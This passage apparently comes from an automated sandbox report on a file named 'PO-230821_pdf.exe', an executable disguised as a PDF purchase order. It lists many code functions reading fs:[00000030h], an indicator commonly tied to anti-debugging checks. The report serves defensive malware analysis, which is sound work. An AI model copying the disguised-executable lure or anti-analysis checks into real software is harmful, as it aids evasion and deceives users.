          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1C050 mov eax, dword ptr fs:[00000030h]2_2_00A1C050
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1A053 mov ecx, dword ptr fs:[00000030h]2_2_00A1A053
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A7705A mov eax, dword ptr fs:[00000030h]2_2_00A7705A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A7705A mov eax, dword ptr fs:[00000030h]2_2_00A7705A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]2_2_00A2A1A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]2_2_00A2A1A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]2_2_00A2A1A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]2_2_00A2A1A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A1A3 mov eax, dword ptr fs:[00000030h]2_2_00A2A1A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A291A5 mov eax, dword ptr fs:[00000030h]2_2_00A291A5
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A291A5 mov eax, dword ptr fs:[00000030h]2_2_00A291A5
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A181AB mov eax, dword ptr fs:[00000030h]2_2_00A181AB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A191B0 mov eax, dword ptr fs:[00000030h]2_2_00A191B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A191B0 mov eax, dword ptr fs:[00000030h]2_2_00A191B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]2_2_00A301B1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]2_2_00A301B1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A301B1 mov eax, dword ptr fs:[00000030h]2_2_00A301B1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A30180 mov eax, dword ptr fs:[00000030h]2_2_00A30180
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A30180 mov eax, dword ptr fs:[00000030h]2_2_00A30180
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AF3186 mov eax, dword ptr fs:[00000030h]2_2_00AF3186
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5318E mov eax, dword ptr fs:[00000030h]2_2_00A5318E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5318E mov eax, dword ptr fs:[00000030h]2_2_00A5318E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5418B mov ecx, dword ptr fs:[00000030h]2_2_00A5418B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5418B mov eax, dword ptr fs:[00000030h]2_2_00A5418B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5418B mov eax, dword ptr fs:[00000030h]2_2_00A5418B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]2_2_00A5A1FB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]2_2_00A5A1FB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5A1FB mov eax, dword ptr fs:[00000030h]2_2_00A5A1FB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1A1C0 mov eax, dword ptr fs:[00000030h]2_2_00A1A1C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F1C0 mov eax, dword ptr fs:[00000030h]2_2_00A4F1C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F1C0 mov eax, dword ptr fs:[00000030h]2_2_00A4F1C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF1DA mov eax, dword ptr fs:[00000030h]2_2_00ADF1DA
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A181DB mov eax, dword ptr fs:[00000030h]2_2_00A181DB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A26139 mov eax, dword ptr fs:[00000030h]2_2_00A26139
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]2_2_00AFB10C
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]2_2_00AFB10C
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]2_2_00AFB10C
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB10C mov eax, dword ptr fs:[00000030h]2_2_00AFB10C
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]2_2_00A1A107
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]2_2_00A1A107
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1A107 mov eax, dword ptr fs:[00000030h]2_2_00A1A107
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAB104 mov eax, dword ptr fs:[00000030h]2_2_00AAB104
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAB104 mov eax, dword ptr fs:[00000030h]2_2_00AAB104
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AF3119 mov eax, dword ptr fs:[00000030h]2_2_00AF3119
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]2_2_00AA0117
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]2_2_00AA0117
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA0117 mov eax, dword ptr fs:[00000030h]2_2_00AA0117
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A49164 mov eax, dword ptr fs:[00000030h]2_2_00A49164
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB316E mov eax, dword ptr fs:[00000030h]2_2_00AB316E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A61160 mov eax, dword ptr fs:[00000030h]2_2_00A61160
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A61160 mov eax, dword ptr fs:[00000030h]2_2_00A61160
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9E179 mov eax, dword ptr fs:[00000030h]2_2_00A9E179
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E176 mov eax, dword ptr fs:[00000030h]2_2_00A5E176
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E176 mov eax, dword ptr fs:[00000030h]2_2_00A5E176
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]2_2_00A35170
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]2_2_00A35170
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]2_2_00A35170
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A35170 mov eax, dword ptr fs:[00000030h]2_2_00A35170
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]2_2_00A24140
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]2_2_00A24140
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A24140 mov eax, dword ptr fs:[00000030h]2_2_00A24140
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF15A mov eax, dword ptr fs:[00000030h]2_2_00ADF15A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A172A0 mov eax, dword ptr fs:[00000030h]2_2_00A172A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2A2A0 mov eax, dword ptr fs:[00000030h]2_2_00A2A2A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]2_2_00A282A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]2_2_00A282A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]2_2_00A282A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A282A0 mov eax, dword ptr fs:[00000030h]2_2_00A282A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1D2AC mov eax, dword ptr fs:[00000030h]2_2_00A1D2AC
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1D2AC mov eax, dword ptr fs:[00000030h]2_2_00A1D2AC
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AEA2B4 mov eax, dword ptr fs:[00000030h]2_2_00AEA2B4
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A302B9 mov eax, dword ptr fs:[00000030h]2_2_00A302B9
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A43295 mov eax, dword ptr fs:[00000030h]2_2_00A43295
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9C290 mov eax, dword ptr fs:[00000030h]2_2_00A9C290
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]2_2_00A3E2E0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]2_2_00A3E2E0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3E2E0 mov eax, dword ptr fs:[00000030h]2_2_00A3E2E0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]2_2_00A1E2E8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]2_2_00A1E2E8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E2E8 mov eax, dword ptr fs:[00000030h]2_2_00A1E2E8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A432FD mov eax, dword ptr fs:[00000030h]2_2_00A432FD
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A192C3 mov eax, dword ptr fs:[00000030h]2_2_00A192C3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A192C3 mov eax, dword ptr fs:[00000030h]2_2_00A192C3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF2C8 mov eax, dword ptr fs:[00000030h]2_2_00ADF2C8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA42C5 mov eax, dword ptr fs:[00000030h]2_2_00AA42C5
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]2_2_00A1B233
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]2_2_00A1B233
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B233 mov eax, dword ptr fs:[00000030h]2_2_00A1B233
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A40200 mov ecx, dword ptr fs:[00000030h]2_2_00A40200
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F21A mov eax, dword ptr fs:[00000030h]2_2_00A4F21A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]2_2_00A9E262
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]2_2_00A9E262
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]2_2_00A9E262
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A9E262 mov eax, dword ptr fs:[00000030h]2_2_00A9E262
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA0261 mov eax, dword ptr fs:[00000030h]2_2_00AA0261
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AA0261 mov eax, dword ptr fs:[00000030h]2_2_00AA0261
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1926F mov eax, dword ptr fs:[00000030h]2_2_00A1926F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1C270 mov ecx, dword ptr fs:[00000030h]2_2_00A1C270
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4427F mov eax, dword ptr fs:[00000030h]2_2_00A4427F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4427F mov eax, dword ptr fs:[00000030h]2_2_00A4427F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]2_2_00A27250
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]2_2_00A27250
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A27250 mov eax, dword ptr fs:[00000030h]2_2_00A27250
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB3AF mov eax, dword ptr fs:[00000030h]2_2_00AFB3AF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFB3AF mov eax, dword ptr fs:[00000030h]2_2_00AFB3AF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A533A0 mov eax, dword ptr fs:[00000030h]2_2_00A533A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AEA3A3 mov eax, dword ptr fs:[00000030h]2_2_00AEA3A3
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]2_2_00A1E380
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]2_2_00A1E380
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1E380 mov eax, dword ptr fs:[00000030h]2_2_00A1E380
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1C387 mov eax, dword ptr fs:[00000030h]2_2_00A1C387
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2638B mov eax, dword ptr fs:[00000030h]2_2_00A2638B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAC380 mov eax, dword ptr fs:[00000030h]2_2_00AAC380
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAD390 mov ecx, dword ptr fs:[00000030h]2_2_00AAD390
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAD390 mov eax, dword ptr fs:[00000030h]2_2_00AAD390
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAD390 mov eax, dword ptr fs:[00000030h]2_2_00AAD390
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B3E0 mov eax, dword ptr fs:[00000030h]2_2_00A1B3E0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A573F5 mov eax, dword ptr fs:[00000030h]2_2_00A573F5
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A573F5 mov ecx, dword ptr fs:[00000030h]2_2_00A573F5
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A163CD mov eax, dword ptr fs:[00000030h]2_2_00A163CD
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF3D2 mov eax, dword ptr fs:[00000030h]2_2_00ADF3D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A2B320 mov eax, dword ptr fs:[00000030h]2_2_00A2B320
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5E335 mov eax, dword ptr fs:[00000030h]2_2_00A5E335
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]2_2_00A18307
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]2_2_00A18307
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A18307 mov eax, dword ptr fs:[00000030h]2_2_00A18307
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]2_2_00AAF31F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]2_2_00AAF31F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]2_2_00AAF31F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]2_2_00AAF31F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AAF31F mov eax, dword ptr fs:[00000030h]2_2_00AAF31F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]2_2_00A4A360
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]2_2_00A4A360
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4A360 mov eax, dword ptr fs:[00000030h]2_2_00A4A360
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A29366 mov eax, dword ptr fs:[00000030h]2_2_00A29366
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A29366 mov eax, dword ptr fs:[00000030h]2_2_00A29366
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov ecx, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov ecx, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ACF37B mov eax, dword ptr fs:[00000030h]2_2_00ACF37B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF34D mov eax, dword ptr fs:[00000030h]2_2_00ADF34D
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]2_2_00A21340
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]2_2_00A21340
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]2_2_00A21340
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]2_2_00A21340
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21340 mov eax, dword ptr fs:[00000030h]2_2_00A21340
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4234A mov eax, dword ptr fs:[00000030h]2_2_00A4234A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3F350 mov eax, dword ptr fs:[00000030h]2_2_00A3F350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
